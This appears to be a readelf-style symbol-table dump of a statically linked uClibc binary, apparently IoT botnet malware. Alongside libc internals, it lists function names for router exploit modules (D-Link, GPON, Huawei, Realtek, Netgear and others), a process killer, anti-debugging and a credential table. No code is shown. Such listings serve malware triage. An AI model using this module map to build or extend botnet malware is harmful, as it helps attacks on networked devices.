__GI_tolower	.symtab	0x40e78c	30	FUNC	<unknown>	HIDDEN	2
__GI_unlink	.symtab	0x4096dc	38	FUNC	<unknown>	HIDDEN	2
__GI_vfork	.symtab	0x40e1c4	21	FUNC	<unknown>	HIDDEN	2
__GI_vfprintf	.symtab	0x409d18	143	FUNC	<unknown>	HIDDEN	2
__GI_vsnprintf	.symtab	0x409b24	199	FUNC	<unknown>	HIDDEN	2
__GI_wait4	.symtab	0x40e604	47	FUNC	<unknown>	HIDDEN	2
__GI_wcrtomb	.symtab	0x40e7b4	68	FUNC	<unknown>	HIDDEN	2
__GI_wcsnrtombs	.symtab	0x40e808	140	FUNC	<unknown>	HIDDEN	2
__GI_wcsrtombs	.symtab	0x40e7f8	15	FUNC	<unknown>	HIDDEN	2
__GI_write	.symtab	0x409704	42	FUNC	<unknown>	HIDDEN	2
__JCR_END__	.symtab	0x518020	0	OBJECT	<unknown>	DEFAULT	8
__JCR_LIST__	.symtab	0x518020	0	OBJECT	<unknown>	DEFAULT	8
__app_fini	.symtab	0x51a928	8	OBJECT	<unknown>	HIDDEN	10
__atexit_lock	.symtab	0x5184e0	40	OBJECT	<unknown>	DEFAULT	9
__bsd_signal	.symtab	0x40bf44	168	FUNC	<unknown>	HIDDEN	2
__bss_start	.symtab	0x518568	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__check_one_fd	.symtab	0x40de32	53	FUNC	<unknown>	DEFAULT	2
__ctype_b	.symtab	0x518518	8	OBJECT	<unknown>	DEFAULT	9
__ctype_tolower	.symtab	0x518528	8	OBJECT	<unknown>	DEFAULT	9
__curbrk	.symtab	0x51a990	8	OBJECT	<unknown>	HIDDEN	10
__data_start	.symtab	0x518050	0	NOTYPE	<unknown>	DEFAULT	9
__decode_answer	.symtab	0x410f38	242	FUNC	<unknown>	HIDDEN	2
__decode_dotted	.symtab	0x411544	246	FUNC	<unknown>	HIDDEN	2
__decode_header	.symtab	0x410e30	161	FUNC	<unknown>	HIDDEN	2
__deregister_frame_info	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__dns_lookup	.symtab	0x40f888	1862	FUNC	<unknown>	HIDDEN	2
__do_global_ctors_aux	.symtab	0x411740	0	FUNC	<unknown>	DEFAULT	2
__do_global_dtors_aux	.symtab	0x400100	0	FUNC	<unknown>	DEFAULT	2
__dso_handle	.symtab	0x518040	0	OBJECT	<unknown>	HIDDEN	9
__encode_dotted	.symtab	0x4114a4	160	FUNC	<unknown>	HIDDEN	2
__encode_header	.symtab	0x410d8c	163	FUNC	<unknown>	HIDDEN	2
__encode_question	.symtab	0x410ed4	80	FUNC	<unknown>	HIDDEN	2
__environ	.symtab	0x51a918	8	OBJECT	<unknown>	DEFAULT	10
__errno_location	.symtab	0x409928	6	FUNC	<unknown>	DEFAULT	2
__errno_location.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__exit_cleanup	.symtab	0x51a908	8	OBJECT	<unknown>	HIDDEN	10
__fgetc_unlocked	.symtab	0x411394	222	FUNC	<unknown>	DEFAULT	2
__fini_array_end	.symtab	0x518000	0	NOTYPE	<unknown>	HIDDEN	SHN_ABS
__fini_array_start	.symtab	0x518000	0	NOTYPE	<unknown>	HIDDEN	SHN_ABS
__get_hosts_byname_r	.symtab	0x410228	48	FUNC	<unknown>	HIDDEN	2
__getdents	.symtab	0x40e2b0	300	FUNC	<unknown>	HIDDEN	2
__getdents64	.symtab	0x40e2b0	300	FUNC	<unknown>	HIDDEN	2
__getpagesize	.symtab	0x40e478	19	FUNC	<unknown>	DEFAULT	2
__glibc_strerror_r	.symtab	0x40b274	14	FUNC	<unknown>	DEFAULT	2
__glibc_strerror_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__h_errno_location	.symtab	0x40e7ac	6	FUNC	<unknown>	DEFAULT	2
__h_errno_location.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__init_array_end	.symtab	0x518000	0	NOTYPE	<unknown>	HIDDEN	SHN_ABS
__init_array_start	.symtab	0x518000	0	NOTYPE	<unknown>	HIDDEN	SHN_ABS
__length_dotted	.symtab	0x41163c	59	FUNC	<unknown>	HIDDEN	2
__length_question	.symtab	0x410f24	19	FUNC	<unknown>	HIDDEN	2
__libc_close	.symtab	0x4093b0	41	FUNC	<unknown>	DEFAULT	2
__libc_connect	.symtab	0x40bd74	43	FUNC	<unknown>	DEFAULT	2
__libc_creat	.symtab	0x40957e	14	FUNC	<unknown>	DEFAULT	2
__libc_fcntl	.symtab	0x40934c	100	FUNC	<unknown>	DEFAULT	2
__libc_fcntl64	.symtab	0x40934c	100	FUNC	<unknown>	DEFAULT	2
__libc_fork	.symtab	0x409408	38	FUNC	<unknown>	DEFAULT	2
__libc_getpid	.symtab	0x409430	38	FUNC	<unknown>	DEFAULT	2
__libc_lseek	.symtab	0x40e4e4	45	FUNC	<unknown>	DEFAULT	2
__libc_lseek64	.symtab	0x40e4dc	5	FUNC	<unknown>	DEFAULT	2
__libc_nanosleep	.symtab	0x40e568	38	FUNC	<unknown>	DEFAULT	2
__libc_open	.symtab	0x409514	106	FUNC	<unknown>	DEFAULT	2
__libc_poll	.symtab	0x4102c8	41	FUNC	<unknown>	DEFAULT	2
__libc_read	.symtab	0x4095b8	39	FUNC	<unknown>	DEFAULT	2
__libc_recv	.symtab	0x40be2c	11	FUNC	<unknown>	DEFAULT	2
__libc_recvfrom	.symtab	0x40be38	45	FUNC	<unknown>	DEFAULT	2
__libc_select	.symtab	0x409608	44	FUNC	<unknown>	DEFAULT	2
__libc_send	.symtab	0x40be68	11	FUNC	<unknown>	DEFAULT	2
__libc_sendto	.symtab	0x40be74	48	FUNC	<unknown>	DEFAULT	2
__libc_sigaction	.symtab	0x40e09d	247	FUNC	<unknown>	DEFAULT	2
__libc_stack_end	.symtab	0x51a910	8	OBJECT	<unknown>	DEFAULT	10
__libc_system	.symtab	0x40d65c	335	FUNC	<unknown>	DEFAULT	2
__libc_write	.symtab	0x409704	42	FUNC	<unknown>	DEFAULT	2
__malloc_consolidate	.symtab	0x40cdfd	410	FUNC	<unknown>	HIDDEN	2
__malloc_largebin_index	.symtab	0x40c048	96	FUNC	<unknown>	DEFAULT	2
__malloc_lock	.symtab	0x518360	40	OBJECT	<unknown>	DEFAULT	9
__malloc_state	.symtab	0x51ade0	1752	OBJECT	<unknown>	DEFAULT	10
__malloc_trim	.symtab	0x40cd64	153	FUNC	<unknown>	DEFAULT	2
__nameserver	.symtab	0x51b4e0	24	OBJECT	<unknown>	HIDDEN	10
__nameservers	.symtab	0x51b4f8	4	OBJECT	<unknown>	HIDDEN	10
__open_etc_hosts	.symtab	0x41102c	42	FUNC	<unknown>	HIDDEN	2
__open_nameservers	.symtab	0x40ffd0	597	FUNC	<unknown>	HIDDEN	2
__pagesize	.symtab	0x51a920	8	OBJECT	<unknown>	DEFAULT	10
__preinit_array_end	.symtab	0x518000	0	NOTYPE	<unknown>	HIDDEN	SHN_ABS
__preinit_array_start	.symtab	0x518000	0	NOTYPE	<unknown>	HIDDEN	SHN_ABS
__pthread_initialize_minimal	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__pthread_mutex_init	.symtab	0x40de2e	3	FUNC	<unknown>	DEFAULT	2
__pthread_mutex_lock	.symtab	0x40de2e	3	FUNC	<unknown>	DEFAULT	2
__pthread_mutex_trylock	.symtab	0x40de2e	3	FUNC	<unknown>	DEFAULT	2
__pthread_mutex_unlock	.symtab	0x40de2e	3	FUNC	<unknown>	DEFAULT	2
__pthread_return_0	.symtab	0x40de2e	3	FUNC	<unknown>	DEFAULT	2
__pthread_return_void	.symtab	0x40de31	1	FUNC	<unknown>	DEFAULT	2
__raise	.symtab	0x410258	18	FUNC	<unknown>	HIDDEN	2
__read_etc_hosts_r	.symtab	0x411056	830	FUNC	<unknown>	HIDDEN	2
__register_frame_info	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__resolv_lock	.symtab	0x518540	40	OBJECT	<unknown>	DEFAULT	9
__restore_rt	.symtab	0x40e094	0	NOTYPE	<unknown>	DEFAULT	2
__rtld_fini	.symtab	0x51a930	8	OBJECT	<unknown>	HIDDEN	10
__searchdomain	.symtab	0x51b4c0	32	OBJECT	<unknown>	HIDDEN	10
__searchdomains	.symtab	0x51b4fc	4	OBJECT	<unknown>	HIDDEN	10
__sigaddset	.symtab	0x40c00c	28	FUNC	<unknown>	DEFAULT	2
__sigdelset	.symtab	0x40c028	30	FUNC	<unknown>	DEFAULT	2
__sigismember	.symtab	0x40bfec	32	FUNC	<unknown>	DEFAULT	2
__stdin	.symtab	0x518138	8	OBJECT	<unknown>	DEFAULT	9
__stdio_READ	.symtab	0x411678	58	FUNC	<unknown>	HIDDEN	2
__stdio_WRITE	.symtab	0x40e894	147	FUNC	<unknown>	HIDDEN	2
__stdio_adjust_position	.symtab	0x4104e8	133	FUNC	<unknown>	HIDDEN	2
__stdio_fwrite	.symtab	0x40e928	259	FUNC	<unknown>	HIDDEN	2
__stdio_init_mutex	.symtab	0x409c57	15	FUNC	<unknown>	HIDDEN	2
__stdio_mutex_initializer.4280	.symtab	0x416440	40	OBJECT	<unknown>	DEFAULT	4
__stdio_rfill	.symtab	0x4116b4	37	FUNC	<unknown>	HIDDEN	2
__stdio_seek	.symtab	0x410798	31	FUNC	<unknown>	HIDDEN	2
__stdio_trans2r_o	.symtab	0x4116dc	90	FUNC	<unknown>	HIDDEN	2
__stdio_trans2w_o	.symtab	0x40ea2c	148	FUNC	<unknown>	HIDDEN	2
__stdio_wcommit	.symtab	0x409cf0	39	FUNC	<unknown>	HIDDEN	2
__stdout	.symtab	0x518140	8	OBJECT	<unknown>	DEFAULT	9
__syscall_error	.symtab	0x4102b0	22	FUNC	<unknown>	HIDDEN	2
__syscall_error.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__syscall_fcntl.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__uClibc_fini	.symtab	0x40dde8	70	FUNC	<unknown>	DEFAULT	2
__uClibc_init	.symtab	0x40de67	67	FUNC	<unknown>	DEFAULT	2
__uClibc_main	.symtab	0x40deaa	489	FUNC	<unknown>	DEFAULT	2
__uClibc_main.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__uclibc_progname	.symtab	0x518508	8	OBJECT	<unknown>	HIDDEN	9
__vfork	.symtab	0x40e1c4	21	FUNC	<unknown>	HIDDEN	2
__xpg_strerror_r	.symtab	0x40b284	194	FUNC	<unknown>	DEFAULT	2
__xpg_strerror_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__xstat64_conv	.symtab	0x40e634	172	FUNC	<unknown>	HIDDEN	2
__xstat_conv	.symtab	0x40e6e0	172	FUNC	<unknown>	HIDDEN	2
_adjust_pos.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_charpad	.symtab	0x409da8	68	FUNC	<unknown>	DEFAULT	2
_cs_funcs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_dl_aux_init	.symtab	0x41026c	23	FUNC	<unknown>	DEFAULT	2
_dl_phdr	.symtab	0x51b500	8	OBJECT	<unknown>	DEFAULT	10
_dl_phnum	.symtab	0x51b508	8	OBJECT	<unknown>	DEFAULT	10
_edata	.symtab	0x518568	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
_end	.symtab	0x51b510	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
_errno	.symtab	0x51a93c	4	OBJECT	<unknown>	DEFAULT	10
_exit	.symtab	0x40e1dc	42	FUNC	<unknown>	DEFAULT	2
_exit.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_fini	.symtab	0x411778	5	FUNC	<unknown>	DEFAULT	3
_fixed_buffers	.symtab	0x5186c0	8192	OBJECT	<unknown>	DEFAULT	10
_fopen.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_fp_out_narrow	.symtab	0x409dec	120	FUNC	<unknown>	DEFAULT	2
_fpmaxtostr	.symtab	0x40ec04	1608	FUNC	<unknown>	HIDDEN	2
_fpmaxtostr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_fwrite.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_h_errno	.symtab	0x51a940	4	OBJECT	<unknown>	DEFAULT	10
_init	.symtab	0x4000e8	5	FUNC	<unknown>	DEFAULT	1
_load_inttype	.symtab	0x40eac0	85	FUNC	<unknown>	HIDDEN	2
_load_inttype.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_ppfs_init	.symtab	0x40a4a0	114	FUNC	<unknown>	HIDDEN	2
_ppfs_init.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_ppfs_parsespec	.symtab	0x40a752	1022	FUNC	<unknown>	HIDDEN	2
_ppfs_parsespec.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_ppfs_prepargs	.symtab	0x40a514	67	FUNC	<unknown>	HIDDEN	2
_ppfs_prepargs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_ppfs_setargs	.symtab	0x40a558	457	FUNC	<unknown>	HIDDEN	2
_ppfs_setargs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_promoted_size	.symtab	0x40a724	46	FUNC	<unknown>	DEFAULT	2
_pthread_cleanup_pop_restore	.symtab	0x40de31	1	FUNC	<unknown>	DEFAULT	2
_pthread_cleanup_push_defer	.symtab	0x40de31	1	FUNC	<unknown>	DEFAULT	2
_rfill.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_sigintr	.symtab	0x51ad60	128	OBJECT	<unknown>	HIDDEN	10
_start	.symtab	0x400194	42	FUNC	<unknown>	DEFAULT	2
_stdio.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_stdio_fopen	.symtab	0x410570	551	FUNC	<unknown>	HIDDEN	2
_stdio_init	.symtab	0x409bec	107	FUNC	<unknown>	HIDDEN	2
_stdio_openlist	.symtab	0x518148	8	OBJECT	<unknown>	DEFAULT	9
_stdio_openlist_add_lock	.symtab	0x518160	40	OBJECT	<unknown>	DEFAULT	9
_stdio_openlist_dec_use	.symtab	0x410828	216	FUNC	<unknown>	DEFAULT	2
_stdio_openlist_del_count	.symtab	0x5186a4	4	OBJECT	<unknown>	DEFAULT	10
_stdio_openlist_del_lock	.symtab	0x5181a0	40	OBJECT	<unknown>	DEFAULT	9
_stdio_openlist_use_count	.symtab	0x5186a0	4	OBJECT	<unknown>	DEFAULT	10
_stdio_streams	.symtab	0x5181e0	384	OBJECT	<unknown>	DEFAULT	9
_stdio_term	.symtab	0x409c66	135	FUNC	<unknown>	HIDDEN	2
_stdio_user_locking	.symtab	0x5181c8	4	OBJECT	<unknown>	DEFAULT	9
_stdlib_strto_l	.symtab	0x40d7cc	362	FUNC	<unknown>	HIDDEN	2
_stdlib_strto_l.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_store_inttype	.symtab	0x40eb18	46	FUNC	<unknown>	HIDDEN	2
_store_inttype.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_string_syserrmsgs	.symtab	0x416580	2906	OBJECT	<unknown>	HIDDEN	4
_string_syserrmsgs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_trans2r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_trans2w.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_uintmaxtostr	.symtab	0x40eb48	187	FUNC	<unknown>	HIDDEN	2
_uintmaxtostr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_vfprintf_internal	.symtab	0x409e64	1595	FUNC	<unknown>	HIDDEN	2
_vfprintf_internal.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_wcommit.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
abort	.symtab	0x40d178	276	FUNC	<unknown>	DEFAULT	2
abort.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
add_auth_entry	.symtab	0x406850	435	FUNC	<unknown>	DEFAULT	2
anti_gdb_entry	.symtab	0x401030	12	FUNC	<unknown>	DEFAULT	2
atoi	.symtab	0x40d7ac	18	FUNC	<unknown>	DEFAULT	2
atoi.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
auth_table	.symtab	0x518688	8	OBJECT	<unknown>	DEFAULT	10
auth_table_len	.symtab	0x518640	4	OBJECT	<unknown>	DEFAULT	10
auth_table_max_weight	.symtab	0x518690	2	OBJECT	<unknown>	DEFAULT	10
bcopy	.symtab	0x40b348	14	FUNC	<unknown>	DEFAULT	2
bcopy.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
been_there_done_that	.symtab	0x51a900	4	OBJECT	<unknown>	DEFAULT	10
been_there_done_that.3160	.symtab	0x51a938	4	OBJECT	<unknown>	DEFAULT	10
bind	.symtab	0x40bd48	43	FUNC	<unknown>	DEFAULT	2
bind.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
brk	.symtab	0x410284	43	FUNC	<unknown>	DEFAULT	2
brk.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
bsd_signal	.symtab	0x40bf44	168	FUNC	<unknown>	DEFAULT	2
buf.5285	.symtab	0x51a6e0	500	OBJECT	<unknown>	DEFAULT	10
calloc	.symtab	0x40c910	248	FUNC	<unknown>	DEFAULT	2
calloc.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
checksum.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
checksum_generic	.symtab	0x4001c0	68	FUNC	<unknown>	DEFAULT	2
checksum_tcpudp	.symtab	0x400210	127	FUNC	<unknown>	DEFAULT	2
clock	.symtab	0x409930	46	FUNC	<unknown>	DEFAULT	2
clock.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
clock_getres	.symtab	0x40e208	41	FUNC	<unknown>	DEFAULT	2
clock_getres.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
close	.symtab	0x4093b0	41	FUNC	<unknown>	DEFAULT	2
close.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
closedir	.symtab	0x409730	116	FUNC	<unknown>	DEFAULT	2
closedir.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
completed.2761	.symtab	0x518580	1	OBJECT	<unknown>	DEFAULT	10
conn_table	.symtab	0x51a9f8	8	OBJECT	<unknown>	DEFAULT	10
connect	.symtab	0x40bd74	43	FUNC	<unknown>	DEFAULT	2
connect.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
creat	.symtab	0x40957e	14	FUNC	<unknown>	DEFAULT	2
crtstuff.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
crtstuff.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
data_start	.symtab	0x518050	0	NOTYPE	<unknown>	DEFAULT	9
decodea.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
decoded.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
decodeh.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
dl-support.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
dnslookup.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
dup2	.symtab	0x4093dc	44	FUNC	<unknown>	DEFAULT	2
dup2.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
encoded.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
encodeh.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
encodeq.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
environ	.symtab	0x51a918	8	OBJECT	<unknown>	DEFAULT	10
errno	.symtab	0x51a93c	4	OBJECT	<unknown>	DEFAULT	10
errno.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
execl	.symtab	0x40d994	287	FUNC	<unknown>	DEFAULT	2
execl.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
execve	.symtab	0x40e234	38	FUNC	<unknown>	DEFAULT	2
execve.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
exit	.symtab	0x40d938	92	FUNC	<unknown>	DEFAULT	2
exit.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
exp10_table	.symtab	0x417c60	208	OBJECT	<unknown>	DEFAULT	4
exploit_kill	.symtab	0x4029e0	16	FUNC	<unknown>	DEFAULT	2
exploit_pid	.symtab	0x51a9e4	4	OBJECT	<unknown>	DEFAULT	10
exploit_socket_crossweb	.symtab	0x403150	151	FUNC	<unknown>	DEFAULT	2
exploit_socket_dlink	.symtab	0x402dd0	183	FUNC	<unknown>	DEFAULT	2
exploit_socket_gpon80	.symtab	0x4050d0	151	FUNC	<unknown>	DEFAULT	2
exploit_socket_gpon8080	.symtab	0x405760	151	FUNC	<unknown>	DEFAULT	2
exploit_socket_hnap	.symtab	0x4032f0	183	FUNC	<unknown>	DEFAULT	2
exploit_socket_huawei	.symtab	0x403710	183	FUNC	<unknown>	DEFAULT	2
exploit_socket_jaws	.symtab	0x402f90	183	FUNC	<unknown>	DEFAULT	2
exploit_socket_netgear	.symtab	0x403c60	273	FUNC	<unknown>	DEFAULT	2
exploit_socket_r7064	.symtab	0x402c30	151	FUNC	<unknown>	DEFAULT	2
exploit_socket_realtek	.symtab	0x404690	301	FUNC	<unknown>	DEFAULT	2
exploit_socket_tr064	.symtab	0x4034b0	346	FUNC	<unknown>	DEFAULT	2
exploit_socket_vacron	.symtab	0x402aa0	140	FUNC	<unknown>	DEFAULT	2
exploit_worker	.symtab	0x405d20	378	FUNC	<unknown>	DEFAULT	2
fake_time	.symtab	0x518694	4	OBJECT	<unknown>	DEFAULT	10
fclose	.symtab	0x4102f4	259	FUNC	<unknown>	DEFAULT	2
fclose.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fcntl	.symtab	0x40934c	100	FUNC	<unknown>	DEFAULT	2
fcntl64	.symtab	0x40934c	100	FUNC	<unknown>	DEFAULT	2
fd_ctrl	.symtab	0x518058	4	OBJECT	<unknown>	DEFAULT	9
fd_serv	.symtab	0x51805c	4	OBJECT	<unknown>	DEFAULT	9
fflush_unlocked	.symtab	0x410900	329	FUNC	<unknown>	DEFAULT	2
fflush_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fgetc_unlocked	.symtab	0x411394	222	FUNC	<unknown>	DEFAULT	2
fgetc_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fgets	.symtab	0x4107b8	109	FUNC	<unknown>	DEFAULT	2
fgets.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fgets_unlocked	.symtab	0x410a4c	116	FUNC	<unknown>	DEFAULT	2
fgets_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fmt	.symtab	0x417c40	20	OBJECT	<unknown>	DEFAULT	4
fopen	.symtab	0x4103f8	10	FUNC	<unknown>	DEFAULT	2
fopen.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fork	.symtab	0x409408	38	FUNC	<unknown>	DEFAULT	2
fork.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fputs_unlocked	.symtab	0x40ab50	56	FUNC	<unknown>	DEFAULT	2
fputs_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
frame_dummy	.symtab	0x400150	0	FUNC	<unknown>	DEFAULT	2
free	.symtab	0x40cf97	452	FUNC	<unknown>	DEFAULT	2
free.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fseek	.symtab	0x410404	5	FUNC	<unknown>	DEFAULT	2
fseeko	.symtab	0x410404	5	FUNC	<unknown>	DEFAULT	2
fseeko.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fseeko64	.symtab	0x41040c	218	FUNC	<unknown>	DEFAULT	2
fseeko64.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fstat	.symtab	0x40e25c	82	FUNC	<unknown>	DEFAULT	2
fstat.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fstat64	.symtab	0x40e25c	82	FUNC	<unknown>	DEFAULT	2
fwrite_unlocked	.symtab	0x40ab88	134	FUNC	<unknown>	DEFAULT	2
fwrite_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
get_hosts_byname_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getc_unlocked	.symtab	0x411394	222	FUNC	<unknown>	DEFAULT	2
getdents64.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getdtablesize	.symtab	0x40e3dc	35	FUNC	<unknown>	DEFAULT	2
getdtablesize.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getegid	.symtab	0x40e400	38	FUNC	<unknown>	DEFAULT	2
getegid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
geteuid	.symtab	0x40e428	38	FUNC	<unknown>	DEFAULT	2
geteuid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getgid	.symtab	0x40e450	38	FUNC	<unknown>	DEFAULT	2
getgid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
gethostbyname	.symtab	0x40b98c	53	FUNC	<unknown>	DEFAULT	2
gethostbyname.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
gethostbyname_r	.symtab	0x40b9c4	897	FUNC	<unknown>	DEFAULT	2
gethostbyname_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getpagesize	.symtab	0x40e478	19	FUNC	<unknown>	DEFAULT	2
getpagesize.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getpid	.symtab	0x409430	38	FUNC	<unknown>	DEFAULT	2
getpid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getppid	.symtab	0x409458	38	FUNC	<unknown>	DEFAULT	2
getppid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getrlimit	.symtab	0x40e48c	40	FUNC	<unknown>	DEFAULT	2
getrlimit.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getrlimit64	.symtab	0x40e48c	40	FUNC	<unknown>	DEFAULT	2
getsockname	.symtab	0x40bda0	41	FUNC	<unknown>	DEFAULT	2
getsockname.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getsockopt	.symtab	0x40bdcc	50	FUNC	<unknown>	DEFAULT	2
getsockopt.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getuid	.symtab	0x40e4b4	38	FUNC	<unknown>	DEFAULT	2
getuid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
h.5284	.symtab	0x51a8e0	32	OBJECT	<unknown>	DEFAULT	10
h_errno	.symtab	0x51a940	4	OBJECT	<unknown>	DEFAULT	10
i	.symtab	0x5185e4	4	OBJECT	<unknown>	DEFAULT	10
index	.symtab	0x40f2b0	417	FUNC	<unknown>	DEFAULT	2
inet_addr	.symtab	0x410d70	28	FUNC	<unknown>	DEFAULT	2
inet_aton	.symtab	0x40f7fc	137	FUNC	<unknown>	DEFAULT	2
inet_aton.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
inet_makeaddr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
inet_ntop	.symtab	0x40b77c	527	FUNC	<unknown>	DEFAULT	2
inet_ntop4	.symtab	0x40b664	280	FUNC	<unknown>	DEFAULT	2
inet_pton	.symtab	0x40b477	493	FUNC	<unknown>	DEFAULT	2
inet_pton4	.symtab	0x40b3f0	135	FUNC	<unknown>	DEFAULT	2
init_exploit	.symtab	0x4010f0	536	FUNC	<unknown>	DEFAULT	2
initfini.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
initstate	.symtab	0x40d342	110	FUNC	<unknown>	DEFAULT	2
initstate_r	.symtab	0x40d5a3	185	FUNC	<unknown>	DEFAULT	2
ioctl	.symtab	0x409480	104	FUNC	<unknown>	DEFAULT	2
ioctl.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
ipState	.symtab	0x518600	40	OBJECT	<unknown>	DEFAULT	10
isatty	.symtab	0x40b364	25	FUNC	<unknown>	DEFAULT	2
isatty.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
kill	.symtab	0x4094e8	44	FUNC	<unknown>	DEFAULT	2
kill.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
killer.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
killer_init	.symtab	0x400800	2047	FUNC	<unknown>	DEFAULT	2
killer_kill	.symtab	0x400290	16	FUNC	<unknown>	DEFAULT	2
